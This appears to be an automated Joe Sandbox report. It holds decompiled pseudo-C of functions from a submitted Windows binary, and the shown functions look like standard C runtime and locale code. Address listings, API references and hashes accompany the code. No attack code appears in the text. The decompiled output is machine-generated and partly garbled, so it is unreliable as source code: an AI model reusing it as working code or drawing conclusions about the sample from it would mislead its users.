                                                • API String ID: 3358926169-648482143
                                                • Opcode ID: 160a984a0763a42fed57c408b74a1bb23260783937fc7b67f553d69d4822ea52
                                                • Instruction ID: 0a679a065eb04b1f50bf5f4a43859ef5633a05caa60c541009f206605c8d725c
                                                • Opcode Fuzzy Hash: 160a984a0763a42fed57c408b74a1bb23260783937fc7b67f553d69d4822ea52
                                                • Instruction Fuzzy Hash: 09F0907D900215AFCB06FBB0CC16ABE7725AFA2761F144519F511AB1D2EF348B0587A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 74%
                                                			E001A7A7F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                				intOrPtr* _t48;
                                                				void* _t64;
                                                				intOrPtr* _t97;
                                                				intOrPtr* _t110;
                                                				intOrPtr* _t112;
                                                				intOrPtr* _t113;
                                                				intOrPtr* _t114;
                                                				void* _t117;
                                                
                                                				_t85 = __ebx;
                                                				_push(8);
                                                				E001A9A79(0x1c68ac, __ebx, __edi, __esi);
                                                				E001A612A(_t117 - 0x14, 0);
                                                				_t112 =  *0x2028c0; // 0x0
                                                				 *(_t117 - 4) =  *(_t117 - 4) & 0x00000000;
                                                				 *((intOrPtr*)(_t117 - 0x10)) = _t112;
                                                				_t48 = E001A1B80( *((intOrPtr*)(_t117 + 8)), E001A1AA0(__ebx, 0x2028b0, __edx, __edi));
                                                				_t109 = _t48;
                                                				if(_t48 != 0) {
                                                					L5:
                                                					E001A6182(_t117 - 0x14);
                                                					return E001A9A56(_t109);
                                                				} else {
                                                					if(_t112 == 0) {
                                                						_push( *((intOrPtr*)(_t117 + 8)));
                                                						_push(_t117 - 0x10);
                                                						__eflags = E001A7F1C(__ebx, _t109, _t112, __eflags) - 0xffffffff;
                                                						if(__eflags == 0) {
                                                							E001A1910();
                                                							asm("int3");
                                                							_push(8);
                                                							E001A9A79(0x1c68ac, __ebx, _t109, _t112);
                                                							E001A612A(_t117 - 0x14, 0);
                                                							_t113 =  *0x2028bc; // 0xb13290
                                                							 *(_t117 - 4) =  *(_t117 - 4) & 0x00000000;
                                                							 *((intOrPtr*)(_t117 - 0x10)) = _t113;
                                                							_t110 = E001A1B80( *((intOrPtr*)(_t117 + 8)), E001A1AA0(_t85, 0x202720, __edx, _t109));
                                                							__eflags = _t110;
                                                							if(_t110 != 0) {
                                                								L12:
                                                								E001A6182(_t117 - 0x14);
                                                								return E001A9A56(_t110);
                                                							} else {
                                                								__eflags = _t113;
                                                								if(__eflags == 0) {
                                                									_push( *((intOrPtr*)(_t117 + 8)));
                                                									_push(_t117 - 0x10); // executed
                                                									_t64 = E001A7F84(_t85, _t110, _t113, __eflags); // executed
                                                									_pop(_t97);
                                                									__eflags = _t64 - 0xffffffff;
                                                									if(__eflags == 0) {
                                                										E001A1910();
                                                										asm("int3");
                                                										_push(8);
                                                										E001A9A79(0x1c68ea, _t85, _t110, _t113);
                                                										_t114 = _t97;
                                                										 *((intOrPtr*)(_t117 - 0x14)) = _t114;
                                                										 *((intOrPtr*)(_t117 - 0x10)) = 0;
                                                										__eflags =  *((intOrPtr*)(_t117 + 0x10));
                                                										if( *((intOrPtr*)(_t117 + 0x10)) != 0) {
                                                											 *_t114 = 0x1c7484;
                                                											 *((intOrPtr*)(_t114 + 0x10)) = 0;
                                                											 *((intOrPtr*)(_t114 + 0x30)) = 0;
                                                											 *((intOrPtr*)(_t114 + 0x34)) = 0;
                                                											 *((intOrPtr*)(_t114 + 0x38)) = 0;
                                                											 *((intOrPtr*)(_t114 + 8)) = 0x1c7478;
                                                											 *(_t117 - 4) = 0;
                                                											 *((intOrPtr*)(_t117 - 0x10)) = 1;
                                                										}
                                                										 *((intOrPtr*)(_t114 +  *((intOrPtr*)( *_t114 + 4)))) = 0x1c7480;
                                                										_t40 =  *((intOrPtr*)( *_t114 + 4)) - 8; // -8
                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t114 + 4)) + _t114 - 4)) = _t40;
                                                										__eflags =  *((intOrPtr*)( *_t114 + 4)) + _t114;
                                                										E001A8284(_t85,  *((intOrPtr*)( *_t114 + 4)) + _t114, _t110,  *((intOrPtr*)( *_t114 + 4)) + _t114,  *((intOrPtr*)(_t117 + 8)),  *((intOrPtr*)(_t117 + 0xc)));
                                                										return E001A9A56(_t114);
                                                									} else {
                                                										_t110 =  *((intOrPtr*)(_t117 - 0x10));
                                                										 *((intOrPtr*)(_t117 - 0x10)) = _t110;
                                                										 *(_t117 - 4) = 1;
                                                										E001A644B(__eflags, _t110);
                                                										 *0x1c7144();
                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t110 + 4))))();
                                                										 *0x2028bc = _t110;
                                                										goto L12;
                                                									}
                                                								} else {
                                                									_t110 = _t113;
                                                									goto L12;
                                                								}
                                                							}
                                                						} else {
                                                							_t109 =  *((intOrPtr*)(_t117 - 0x10));
                                                							 *((intOrPtr*)(_t117 - 0x10)) = _t109;
                                                							 *(_t117 - 4) = 1;
                                                							E001A644B(__eflags, _t109);
                                                							 *0x1c7144();
                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t109 + 4))))();
                                                							 *0x2028c0 = _t109;
                                                							goto L5;
                                                						}
                                                					} else {
                                                						_t109 = _t112;
                                                						goto L5;
                                                					}
                                                				}
                                                			}











                                                0x001a7a7f
                                                0x001a7a7f
                                                0x001a7a86
                                                0x001a7a90
                                                0x001a7a95
                                                0x001a7aa0
                                                0x001a7aa4
                                                0x001a7ab0
                                                0x001a7ab5
                                                0x001a7ab9
                                                0x001a7afe
                                                0x001a7b01
                                                0x001a7b0d
                                                0x001a7abb
                                                0x001a7abd
                                                0x001a7ac3
                                                0x001a7ac9
                                                0x001a7ad1
                                                0x001a7ad4
                                                0x001a7b0e
                                                0x001a7b13
                                                0x001a7b14
                                                0x001a7b1b
                                                0x001a7b25
                                                0x001a7b2a
                                                0x001a7b35
                                                0x001a7b39
                                                0x001a7b4a
                                                0x001a7b4c
                                                0x001a7b4e
                                                0x001a7b93
                                                0x001a7b96
                                                0x001a7ba2
                                                0x001a7b50
                                                0x001a7b50
                                                0x001a7b52
                                                0x001a7b58
                                                0x001a7b5e
                                                0x001a7b5f
                                                0x001a7b65
                                                0x001a7b66
                                                0x001a7b69
                                                0x001a7ba3
                                                0x001a7ba8
                                                0x001a7ba9
                                                0x001a7bb0
                                                0x001a7bb5
                                                0x001a7bb7
                                                0x001a7bbc
                                                0x001a7bbf
                                                0x001a7bc2
                                                0x001a7bc4
                                                0x001a7bca
                                                0x001a7bcd
                                                0x001a7bd0
                                                0x001a7bd3
                                                0x001a7bd6
                                                0x001a7bdd
                                                0x001a7be0
                                                0x001a7be0
                                                0x001a7bf2
                                                0x001a7bfe
                                                0x001a7c01
                                                0x001a7c0a
                                                0x001a7c0c
                                                0x001a7c18
                                                0x001a7b6b
                                                0x001a7b6b
                                                0x001a7b6e
                                                0x001a7b72
                                                0x001a7b76
                                                0x001a7b83
                                                0x001a7b8b
                                                0x001a7b8d
                                                0x00000000
                                                0x001a7b8d
                                                0x001a7b54
                                                0x001a7b54
                                                0x00000000
                                                0x001a7b54
                                                0x001a7b52
                                                0x001a7ad6
                                                0x001a7ad6
                                                0x001a7ad9
                                                0x001a7add
                                                0x001a7ae1
                                                0x001a7aee
                                                0x001a7af6
                                                0x001a7af8
                                                0x00000000
                                                0x001a7af8
                                                0x001a7abf
                                                0x001a7abf
                                                0x00000000
                                                0x001a7abf
                                                0x001a7abd

                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 001A7A86
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 001A7A90
                                                  • Part of subcall function 001A1AA0: std::_Lockit::_Lockit.LIBCPMT ref: 001A1ABC
                                                  • Part of subcall function 001A1AA0: std::_Lockit::~_Lockit.LIBCPMT ref: 001A1AD9
                                                • codecvt.LIBCPMT ref: 001A7ACA
                                                • std::_Facet_Register.LIBCPMT ref: 001A7AE1
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 001A7B01
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                • String ID:
                                                • API String ID: 712880209-0
                                                • Opcode ID: 8767c7605b5e585c92d10fdaebf64f64590831e7abd622d9a58c4edd2de8519c
                                                • Instruction ID: 4a3e4379bf920309bc6de6be0e03810eafb56a6f546a06a6f4351fa706559e9c
                                                • Opcode Fuzzy Hash: 8767c7605b5e585c92d10fdaebf64f64590831e7abd622d9a58c4edd2de8519c
                                                • Instruction Fuzzy Hash: 3201D63D904215EFCB06EB64DC156BE7771AFA6710F284409E411672D2DF749F01C791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 19%
                                                			E001BF0F3() {
                                                				intOrPtr _v8;
                                                				signed int _v12;
                                                				WCHAR* _t5;
                                                				void* _t6;
                                                				intOrPtr _t9;
                                                				WCHAR* _t10;
                                                				WCHAR* _t19;
                                                				WCHAR* _t26;
                                                				WCHAR* _t29;
                                                
                                                				_push(_t21);
                                                				_t5 = GetEnvironmentStringsW();
                                                				_t29 = _t5;
                                                				if(_t29 != 0) {
                                                					_t6 = E001BF0BC(_t29);
                                                					_t19 = 0;
                                                					_v12 = _t6 - _t29 >> 1;
                                                					_t9 = E001BDD41(0, 0, _t29, _t6 - _t29 >> 1, 0, 0, 0, 0);
                                                					_v8 = _t9;
                                                					if(_t9 != 0) {
                                                						_t10 = E001B6429(_t9); // executed
                                                						_t26 = _t10;
                                                						_push(0);
                                                						if(_t26 != 0) {
                                                							_push(0);
                                                							_push(_v8);
                                                							_push(_t26);
                                                							_push(_v12);
                                                							_push(_t29);
                                                							_push(0);
                                                							_push(0);
                                                							if(E001BDD41() != 0) {
                                                								E001B63EF(0);
                                                								_t19 = _t26;
                                                							} else {
                                                								E001B63EF(_t26);
                                                							}
                                                							FreeEnvironmentStringsW(_t29);
                                                							_t5 = _t19;
                                                						} else {
                                                							E001B63EF();
                                                							FreeEnvironmentStringsW(_t29);
                                                							_t5 = 0;
                                                						}
                                                					} else {
                                                						FreeEnvironmentStringsW(_t29);
                                                						_t5 = 0;
                                                					}
                                                				}
                                                				return _t5;
                                                			}












                                                0x001bf0f9
                                                0x001bf0fb
                                                0x001bf101
                                                0x001bf105
                                                0x001bf10d
                                                0x001bf112
                                                0x001bf120
                                                0x001bf123
                                                0x001bf12b
                                                0x001bf130
                                                0x001bf13f
                                                0x001bf144
                                                0x001bf147
                                                0x001bf14a
                                                0x001bf15d
                                                0x001bf15e
                                                0x001bf161
                                                0x001bf162
                                                0x001bf165
                                                0x001bf166
                                                0x001bf167
                                                0x001bf172
                                                0x001bf17d
                                                0x001bf182
                                                0x001bf174
                                                0x001bf175
                                                0x001bf175
                                                0x001bf186
                                                0x001bf18c
                                                0x001bf14c
                                                0x001bf14c
                                                0x001bf153
                                                0x001bf159
                                                0x001bf159
                                                0x001bf132
                                                0x001bf133
                                                0x001bf139
                                                0x001bf139
                                                0x001bf18f
                                                0x001bf192

                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 001BF0FB
                                                  • Part of subcall function 001BDD41: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,001BC41B,?,00000000,-00000008), ref: 001BDDED
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001BF133
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001BF153
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                • String ID:
                                                • API String ID: 158306478-0
                                                • Opcode ID: fb0956acd832302a403a6def59cff5633bf2b0b2566c2c00e216d24507b35c13
                                                • Instruction ID: da692f8a9dad07389869e6df4612f5cba152ece148f437d0851d258691616730
                                                • Opcode Fuzzy Hash: fb0956acd832302a403a6def59cff5633bf2b0b2566c2c00e216d24507b35c13
                                                • Instruction Fuzzy Hash: 2411C0F2505619BEA71627BAEC8ACEF6D9CDEA93A4714042CF409D1141FBA4CD428AB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 154 1a1990-1a19d6 call 1a612a 157 1a19e8-1a19f2 call 1a62f1 154->157 158 1a19d8-1a19da call 1a657d 154->158 161 1a19df-1a19e5 158->161
                                                C-Code - Quality: 74%
                                                			E001A1990(signed int* __ecx, void* __esi) {
                                                				intOrPtr _v0;
                                                				signed int _t37;
                                                				signed int* _t51;
                                                				signed int* _t55;
                                                				signed int* _t56;
                                                				void* _t59;
                                                				void* _t60;
                                                
                                                				_t50 = __ecx;
                                                				_t55 = __ecx;
                                                				E001A612A(__ecx, 0);
                                                				__ecx[1] = 0;
                                                				__ecx[6] = 0;
                                                				__ecx[7] = 0;
                                                				__ecx[8] = 0;
                                                				__ecx[9] = 0;
                                                				__ecx[0xa] = 0;
                                                				__ecx[0xb] = 0;
                                                				__ecx[0xc] = 0;
                                                				_t28 = _v0;
                                                				__ecx[2] = 0;
                                                				__ecx[3] = 0;
                                                				__ecx[4] = 0;
                                                				__ecx[5] = 0;
                                                				if(_v0 == 0) {
                                                					E001A62F1("bad locale name");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					_push(_t55);
                                                					_t56 = _t50;
                                                					E001A65C8(_t50, _t56);
                                                					_t31 = _t56[0xb];
                                                					_t60 = _t59 + 4;
                                                					if(_t56[0xb] != 0) {
                                                						E001AFB09(_t31);
                                                						_t60 = _t60 + 4;
                                                					}
                                                					_t56[0xb] = 0;
                                                					_t32 = _t56[9];
                                                					if(_t56[9] != 0) {
                                                						E001AFB09(_t32);
                                                						_t60 = _t60 + 4;
                                                					}
                                                					_t56[9] = 0;
                                                					_t33 = _t56[7];
                                                					if(_t56[7] != 0) {
                                                						E001AFB09(_t33);
                                                						_t60 = _t60 + 4;
                                                					}
                                                					_t56[7] = 0;
                                                					_t34 = _t56[5];
                                                					if(_t56[5] != 0) {
                                                						E001AFB09(_t34);
                                                						_t60 = _t60 + 4;
                                                					}
                                                					_t56[5] = 0;
                                                					_t35 = _t56[3];
                                                					if(_t56[3] != 0) {
                                                						E001AFB09(_t35);
                                                						_t60 = _t60 + 4;
                                                					}
                                                					_t56[3] = 0;
                                                					_t36 = _t56[1];
                                                					if(_t56[1] != 0) {
                                                						E001AFB09(_t36);
                                                					}
                                                					_t56[1] = 0;
                                                					_t51 = _t56;
                                                					_t37 =  *_t51;
                                                					if(_t37 == 0) {
                                                						return E001AFFDD(4);
                                                					} else {
                                                						if(_t37 < 8) {
                                                							return E001A9014(0x202648 + _t37 * 0x18, 0x202648 + _t37 * 0x18);
                                                						}
                                                						return _t37;
                                                					}
                                                				} else {
                                                					E001A657D(__ecx, __ecx, _t28); // executed
                                                					return _t55;
                                                				}
                                                			}










                                                0x001a1990
                                                0x001a1993
                                                0x001a1995
                                                0x001a199c
                                                0x001a19a3
                                                0x001a19a7
                                                0x001a19aa
                                                0x001a19ae
                                                0x001a19b1
                                                0x001a19b4
                                                0x001a19b7
                                                0x001a19ba
                                                0x001a19be
                                                0x001a19c2
                                                0x001a19c9
                                                0x001a19cd
                                                0x001a19d6
                                                0x001a19ed
                                                0x001a19f2
                                                0x001a19f3
                                                0x001a19f4
                                                0x001a19f5
                                                0x001a19f6
                                                0x001a19f7
                                                0x001a19f8
                                                0x001a19f9
                                                0x001a19fa
                                                0x001a19fb
                                                0x001a19fc
                                                0x001a19fd
                                                0x001a19fe
                                                0x001a19ff
                                                0x001a1a00
                                                0x001a1a01
                                                0x001a1a04
                                                0x001a1a09
                                                0x001a1a0c
                                                0x001a1a11
                                                0x001a1a14
                                                0x001a1a19
                                                0x001a1a19
                                                0x001a1a1c
                                                0x001a1a23
                                                0x001a1a28
                                                0x001a1a2b
                                                0x001a1a30
                                                0x001a1a30
                                                0x001a1a33
                                                0x001a1a3a
                                                0x001a1a3f
                                                0x001a1a42
                                                0x001a1a47
                                                0x001a1a47
                                                0x001a1a4a
                                                0x001a1a51
                                                0x001a1a56
                                                0x001a1a59
                                                0x001a1a5e
                                                0x001a1a5e
                                                0x001a1a61
                                                0x001a1a68
                                                0x001a1a6d
                                                0x001a1a70
                                                0x001a1a75
                                                0x001a1a75
                                                0x001a1a78
                                                0x001a1a7f
                                                0x001a1a84
                                                0x001a1a87
                                                0x001a1a8c
                                                0x001a1a8f
                                                0x001a1a96
                                                0x001a6182
                                                0x001a6186
                                                0x001b000a
                                                0x001a618c
                                                0x001a618f
                                                0x00000000
                                                0x001a619f
                                                0x001a61a0
                                                0x001a61a0
                                                0x001a19d8
                                                0x001a19da
                                                0x001a19e5
                                                0x001a19e5

                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 001A1995
                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 001A19DA
                                                  • Part of subcall function 001A657D: _Yarn.LIBCPMT ref: 001A659C
                                                  • Part of subcall function 001A657D: _Yarn.LIBCPMT ref: 001A65C0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                • String ID: bad locale name
                                                • API String ID: 1908188788-1405518554
                                                • Opcode ID: b4e778d63f505bc5ef9a295590888db5ee1f51b58767f6114f6a482ec36a6319
                                                • Instruction ID: 2f302b893da4bbebadc378994360848fd42072bc153d6ad7dcdd1d647032ea4a
                                                • Opcode Fuzzy Hash: b4e778d63f505bc5ef9a295590888db5ee1f51b58767f6114f6a482ec36a6319
                                                • Instruction Fuzzy Hash: 88F017B4505B409ED370DF798415743BEE0AF2A314F048E2EE4DAC7A42E375E508CBA6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 100%
                                                			E001B3DC5(int _a4) {
                                                				void* _t8;
                                                				void* _t10;
                                                
                                                				if(E001B3E39(_t8, _t10) != 0) {
                                                					TerminateProcess(GetCurrentProcess(), _a4);
                                                				}
                                                				E001B3E5B(_a4);
                                                				ExitProcess(_a4);
                                                			}





                                                0x001b3dd1
                                                0x001b3ddd
                                                0x001b3ddd
                                                0x001b3de6
                                                0x001b3def

                                                APIs
                                                • GetCurrentProcess.KERNEL32(001B3F1B,?,001B3DBF,00000000,?,?,001B3F1B,8121A627,?,001B3F1B), ref: 001B3DD6
                                                • TerminateProcess.KERNEL32(00000000,?,001B3DBF,00000000,?,?,001B3F1B,8121A627,?,001B3F1B), ref: 001B3DDD
                                                • ExitProcess.KERNEL32 ref: 001B3DEF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: e044192a29438b2ac12d002bdc55ab9b23cdbec99b6a4df13a3dc4d5fc3e6a44
                                                • Instruction ID: 250d7aedc499807bd795d7318cd4cd1dca395e55be8230e915eda770df47822e
                                                • Opcode Fuzzy Hash: e044192a29438b2ac12d002bdc55ab9b23cdbec99b6a4df13a3dc4d5fc3e6a44
                                                • Instruction Fuzzy Hash: 35D09231004249ABCF512FA0ED0DDAE3F2AEF41741B444055FA2A4A5B1DFB6DBB29F94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 170 1baa00-1baa1f 171 1babf9 170->171 172 1baa25-1baa27 170->172 173 1babfb-1babff 171->173 174 1baa29-1baa48 call 1afdc6 172->174 175 1baa53-1baa79 172->175 183 1baa4b-1baa4e 174->183 176 1baa7b-1baa7d 175->176 177 1baa7f-1baa85 175->177 176->177 179 1baa87-1baa91 176->179 177->174 177->179 181 1baa93-1baa9e call 1bb474 179->181 182 1baaa1-1baaac call 1ba584 179->182 181->182 188 1baaee-1bab00 182->188 189 1baaae-1baab3 182->189 183->173 190 1bab02-1bab08 188->190 191 1bab51-1bab71 WriteFile 188->191 192 1baad8-1baaec call 1ba14a 189->192 193 1baab5-1baab9 189->193 197 1bab0a-1bab0d 190->197 198 1bab3f-1bab4a call 1ba602 190->198 194 1bab7c 191->194 195 1bab73-1bab79 GetLastError 191->195 209 1baad1-1baad3 192->209 199 1baabf-1baace call 1ba51c 193->199 200 1babc1-1babd3 193->200 202 1bab7f-1bab8a 194->202 195->194 203 1bab0f-1bab12 197->203 204 1bab2d-1bab3d call 1ba7c6 197->204 215 1bab4f 198->215 199->209 205 1babdd-1babef 200->205 206 1babd5-1babdb 200->206 210 1bab8c-1bab91 202->210 211 1babf4-1babf7 202->211 203->200 212 1bab18-1bab23 call 1ba6dd 203->212 216 1bab28-1bab2b 204->216 205->183 206->171 206->205 209->202 217 1babbf 210->217 218 1bab93-1bab98 210->218 211->173 212->216 215->216 216->209 217->200 221 1bab9a-1babac 218->221 222 1babb1-1babba call 1aff0a 218->222 221->183 222->183
                                                C-Code - Quality: 93%
                                                			E001BAA00(signed int _a4, void* _a8, signed int _a12, intOrPtr _a16) {
                                                				void* _v5;
                                                				void* _v12;
                                                				long _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				intOrPtr _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				long _v44;
                                                				char _v48;
                                                				intOrPtr _v52;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				void* _t78;
                                                				intOrPtr _t82;
                                                				char _t83;
                                                				signed char _t85;
                                                				signed int _t87;
                                                				signed int _t90;
                                                				signed int _t92;
                                                				signed int _t95;
                                                				signed int _t96;
                                                				signed int _t101;
                                                				signed int _t104;
                                                				signed int _t108;
                                                				intOrPtr _t113;
                                                				signed int _t114;
                                                				intOrPtr _t117;
                                                				signed int _t119;
                                                				struct _OVERLAPPED* _t120;
                                                				signed int _t123;
                                                				signed int _t124;
                                                				signed int _t127;
                                                				struct _OVERLAPPED* _t129;
                                                				void* _t132;
                                                
                                                				_t114 = _a12;
                                                				_t78 = _a8;
                                                				_v12 = _t78;
                                                				_v16 = _t114;
                                                				_t113 = _a16;
                                                				_t124 = _a4;
                                                				if(_t114 == 0) {
                                                					L36:
                                                					__eflags = 0;
                                                					return 0;
                                                				}
                                                				if(_t78 != 0) {
                                                					_t127 = _t124 >> 6;
                                                					_t123 = (_t124 & 0x0000003f) * 0x38;
                                                					_v20 = _t127;
                                                					_t82 =  *((intOrPtr*)(0x203178 + _t127 * 4));
                                                					_v52 = _t82;
                                                					_v24 = _t123;
                                                					_t83 =  *((intOrPtr*)(_t123 + _t82 + 0x29));
                                                					_v5 = _t83;
                                                					__eflags = _t83 - 2;
                                                					if(_t83 == 2) {
                                                						L6:
                                                						_t85 =  !_t114;
                                                						__eflags = _t85 & 0x00000001;
                                                						if((_t85 & 0x00000001) == 0) {
                                                							goto L2;
                                                						}
                                                						L7:
                                                						_t129 = 0;
                                                						__eflags =  *(_t123 + _v52 + 0x28) & 0x00000020;
                                                						if(__eflags != 0) {
                                                							E001BB474(_t124, 0, 0, 2, _t113);
                                                							_t132 = _t132 + 0x14;
                                                						}
                                                						_t90 = E001BA584(_t114, __eflags, _t124, _t113);
                                                						__eflags = _t90;
                                                						if(_t90 == 0) {
                                                							_t117 =  *((intOrPtr*)(0x203178 + _v20 * 4));
                                                							_t92 = _v24;
                                                							__eflags =  *((char*)(_t92 + _t117 + 0x28));
                                                							if( *((char*)(_t92 + _t117 + 0x28)) >= 0) {
                                                								asm("stosd");
                                                								asm("stosd");
                                                								asm("stosd");
                                                								_t95 = WriteFile( *(_t92 + _t117 + 0x18), _v12, _v16,  &_v44, _t129);
                                                								__eflags = _t95;
                                                								if(_t95 == 0) {
                                                									_v48 = GetLastError();
                                                								}
                                                								goto L26;
                                                							}
                                                							_t101 = _v5 - _t129;
                                                							__eflags = _t101;
                                                							if(_t101 == 0) {
                                                								E001BA602( &_v48, _t124, _v12, _v16); // executed
                                                								L20:
                                                								goto L13;
                                                							}
                                                							_t104 = _t101 - 1;
                                                							__eflags = _t104;
                                                							if(_t104 == 0) {
                                                								_t103 = E001BA7C6( &_v48, _t124, _v12, _v16);
                                                								goto L20;
                                                							}
                                                							__eflags = _t104 != 1;
                                                							if(_t104 != 1) {
                                                								goto L32;
                                                							}
                                                							_t103 = E001BA6DD( &_v48, _t124, _v12, _v16);
                                                							goto L20;
                                                						} else {
                                                							_t108 = _v5;
                                                							__eflags = _t108;
                                                							if(_t108 == 0) {
                                                								_t103 = E001BA14A( &_v48, _t124, _v12, _v16, _t113);
                                                								L13:
                                                								L26:
                                                								asm("movsd");
                                                								asm("movsd");
                                                								asm("movsd");
                                                								_t96 = _v32;
                                                								__eflags = _t96;
                                                								if(_t96 != 0) {
                                                									return _t96 - _v28;
                                                								}
                                                								_t87 = _v36;
                                                								__eflags = _t87;
                                                								if(_t87 == 0) {
                                                									_t129 = 0;
                                                									__eflags = 0;
                                                									L32:
                                                									_t119 = _v24;
                                                									_t87 =  *(0x203178 + _v20 * 4);
                                                									__eflags =  *(_t119 + _t87 + 0x28) & 0x00000040;
                                                									if(( *(_t119 + _t87 + 0x28) & 0x00000040) == 0) {
                                                										L34:
                                                										 *((char*)(_t113 + 0x1c)) = 1;
                                                										 *((intOrPtr*)(_t113 + 0x18)) = 0x1c;
                                                										 *((char*)(_t113 + 0x24)) = 1;
                                                										 *(_t113 + 0x20) = _t129;
                                                										L3:
                                                										return _t87 | 0xffffffff;
                                                									}
                                                									_t87 = _v12;
                                                									__eflags =  *_t87 - 0x1a;
                                                									if( *_t87 == 0x1a) {
                                                										goto L36;
                                                									}
                                                									goto L34;
                                                								}
                                                								_t120 = 5;
                                                								__eflags = _t87 - _t120;
                                                								if(_t87 != _t120) {
                                                									_t87 = E001AFF0A(_t87, _t113);
                                                								} else {
                                                									 *((char*)(_t113 + 0x1c)) = 1;
                                                									 *((intOrPtr*)(_t113 + 0x18)) = 9;
                                                									 *((char*)(_t113 + 0x24)) = 1;
                                                									 *(_t113 + 0x20) = _t120;
                                                								}
                                                								goto L3;
                                                							}
                                                							__eflags = _t108 - 1 - 1;
                                                							if(_t108 - 1 > 1) {
                                                								goto L32;
                                                							}
                                                							E001BA51C( &_v48, _v12, _v16);
                                                							goto L13;
                                                						}
                                                					}
                                                					__eflags = _t83 - 1;
                                                					if(_t83 != 1) {
                                                						goto L7;
                                                					}
                                                					goto L6;
                                                				}
                                                				L2:
                                                				 *((char*)(_t113 + 0x24)) = 1;
                                                				 *(_t113 + 0x20) = 0;
                                                				 *((char*)(_t113 + 0x1c)) = 1;
                                                				 *((intOrPtr*)(_t113 + 0x18)) = 0x16;
                                                				_t87 = E001AFDC6(_t124, _t127, 0, 0, 0, 0, 0, _t113);
                                                				goto L3;
                                                			}







































                                                0x001baa08
                                                0x001baa0b
                                                0x001baa0e
                                                0x001baa11
